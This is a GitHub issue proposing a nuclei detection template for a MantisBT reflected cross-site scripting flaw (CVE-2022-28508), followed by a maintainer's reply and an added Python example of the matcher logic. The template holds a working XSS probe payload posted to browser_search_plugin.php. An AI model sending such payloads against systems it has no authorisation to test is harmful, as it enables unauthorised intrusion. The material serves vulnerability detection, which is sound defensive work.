projectdiscovery / nuclei-templates

Community curated list of templates for the nuclei engine to find security vulnerabilities.

Home Page: https://github.com/projectdiscovery/nuclei

CVE-2022-28508

akincibor opened this issue · comments

```yaml
id: CVE-2022-28508

info:
  name: MantisBT < 2.25.2 - Reflected Cross-Site Scripting
  author: Akincibor
  severity: medium
  description: An XSS issue was discovered in browser_search_plugin.php in MantisBT before 2.25.2. Unescaped output of the return parameter allows an attacker to inject code into a hidden input field.
  reference:
    - https://github.com/YavuzSahbaz/CVE-2022-28508/blob/main/MantisBT%202.25.2%20XSS%20vulnurability
  tags: xss

requests:
  - method: POST
    path:
      - "{{BaseURL}}/man/browser_search_plugin.php"

    body: |
      type=text'"()%26%25<acx><ScRiPt%20>N8Zn(9266)</ScRiPt>
    headers:
      Content-Type: "application/x-www-form-urlencoded"

    # All three matchers below must succeed before a finding is reported.
    matchers-condition: and
    matchers:
      # The injected marker must be reflected unescaped in the response body.
      - type: word
        part: body
        words:
          - '"()&acx><script>n8zn(9266)</script>'

      # Only an HTML response can render the reflected marker.
      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
```

Hi @akincibor, the response time to this issue was much longer than usual. We were unable to set up a vulnerable environment for this CVE, so this PR has been put on hold. We would appreciate it if someone could provide us with the debug data or steps to set up a vulnerable environment. We would need to add an additional matcher in order to prevent false positive results.

Also, feel free to join the Discord server if you have more info that you can share directly over DM.
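The matcher logic of the template above, and the maintainer's point that an additional matcher is needed to avoid false positives, as an added Python example that is not code from the nuclei-templates project or from either participant in this issue. It re-implements the subset of nuclei matcher semantics the template relies on (word matchers on body and header, a status matcher, `matchers-condition: and`) and runs them over three constructed responses: a page that reflects the marker unescaped, the same page with the value HTML-escaped, and an unrelated application that merely echoes its input. The sample responses are constructed, not captured from a real MantisBT install, and the `MantisBT` fingerprint string used as the extra matcher is an assumption made for illustration, not a value taken from the issue.

```python
"""Added example (not code from the nuclei-templates project or this issue):
a minimal re-implementation of the word/status matcher semantics used by the
template above, run against constructed HTTP responses."""

from __future__ import annotations

# Matchers copied from the template's `matchers:` block. nuclei evaluates a
# word matcher's `words` list with `condition: or` unless told otherwise.
TEMPLATE_MATCHERS = [
    {"type": "word", "part": "body", "words": ['"()&acx><script>n8zn(9266)</script>']},
    {"type": "word", "part": "header", "words": ["text/html"]},
    {"type": "status", "status": [200]},
]

# Hypothetical extra matcher of the kind the maintainer asked for: a string a
# generic echo page would not contain. "MantisBT" is an assumption made for
# this example, not a fingerprint taken from the issue.
FINGERPRINT_MATCHER = {"type": "word", "part": "body", "words": ["MantisBT"]}


def parse_response(raw: str) -> tuple[int, str, str]:
    """Split a raw HTTP/1.x response into (status_code, header_block, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    status_line, _, header_block = head.partition("\r\n")
    status_code = int(status_line.split()[1])
    return status_code, header_block, body


def match_one(matcher: dict, status_code: int, header_block: str, body: str) -> bool:
    """Evaluate one matcher with the subset of nuclei semantics this example needs."""
    if matcher["type"] == "status":
        return status_code in matcher["status"]
    if matcher["type"] == "word":
        haystack = body if matcher.get("part", "body") == "body" else header_block
        hits = [word in haystack for word in matcher["words"]]
        return all(hits) if matcher.get("condition", "or") == "and" else any(hits)
    raise ValueError(f"unsupported matcher type: {matcher['type']!r}")


def evaluate(matchers: list[dict], raw_response: str, condition: str = "and") -> bool:
    """Apply `matchers-condition` (and/or) across all matchers for one response."""
    status_code, header_block, body = parse_response(raw_response)
    results = [match_one(m, status_code, header_block, body) for m in matchers]
    return all(results) if condition == "and" else any(results)


# Constructed sample responses (not captured from a real MantisBT install).
HTML_200 = "HTTP/1.1 200 OK\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n"

# 1. Vulnerable-looking page: the marker comes back verbatim inside the hidden input.
REFLECTED = HTML_200 + (
    "<html><head><title>MantisBT - Search</title></head><body>"
    '<input type="hidden" name="type" value="text\'"()&acx><script>n8zn(9266)</script>">'
    "</body></html>"
)

# 2. Patched-looking page: the same value HTML-escaped, so the marker substring is absent.
ESCAPED = HTML_200 + (
    "<html><head><title>MantisBT - Search</title></head><body>"
    '<input type="hidden" name="type" value="text&#039;&quot;()&amp;acx&gt;&lt;script&gt;n8zn(9266)&lt;/script&gt;">'
    "</body></html>"
)

# 3. Unrelated application that echoes its input unescaped: satisfies all three of the
#    template's matchers although it is not MantisBT (the false positive the maintainer means).
GENERIC_ECHO = HTML_200 + "<p>You searched for: text'\"()&acx><script>n8zn(9266)</script></p>"


if __name__ == "__main__":
    samples = [("reflected", REFLECTED), ("escaped", ESCAPED), ("generic echo", GENERIC_ECHO)]
    for name, resp in samples:
        base = evaluate(TEMPLATE_MATCHERS, resp)
        strict = evaluate(TEMPLATE_MATCHERS + [FINGERPRINT_MATCHER], resp)
        print(f"{name:13s} template matchers: {base!s:5s} with fingerprint matcher: {strict}")
```

Run stand-alone, the script shows the template's three matchers firing on both the reflected MantisBT-style page and the unrelated echo page, while the escaped page never matches; appending the fingerprint word matcher is what separates the two positives, which is the gap the maintainer's comment refers to.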